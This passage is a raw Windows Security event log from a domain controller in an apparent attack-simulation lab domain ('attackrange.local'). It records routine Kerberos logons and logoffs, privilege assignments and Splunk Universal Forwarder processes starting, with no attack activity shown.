Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:23:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263738
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7529F8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:23:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263737
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7529F8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51468
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:23:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263736
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7529F8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:24:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263746
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x752FD4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 51474
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:24:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263745
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x752FD4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:24:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263744
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x752F8C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:24:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263743
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x752F8C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:24:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263742
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x752E9D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51473
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:24:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263741
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x752E9D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:24:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263740
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x752E7B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51472
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:24:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263739
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x752E7B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:24:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263751
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x752E9D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:24:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263750
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x752F8C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:24:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263749
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x752FD4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:24:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263748
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7530AC
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51477
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:24:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263747
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7530AC
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:24:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263752
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1650
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:24:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263754
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:24:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263753
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa8c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:24:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263755
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11ac
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:24:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263756
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x8c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:24:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263758
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a9c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:24:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263757
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bd0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:24:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263759
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7530AC
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:24:34 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263760
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74A49B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:24:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263763
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x756A66
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:24:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
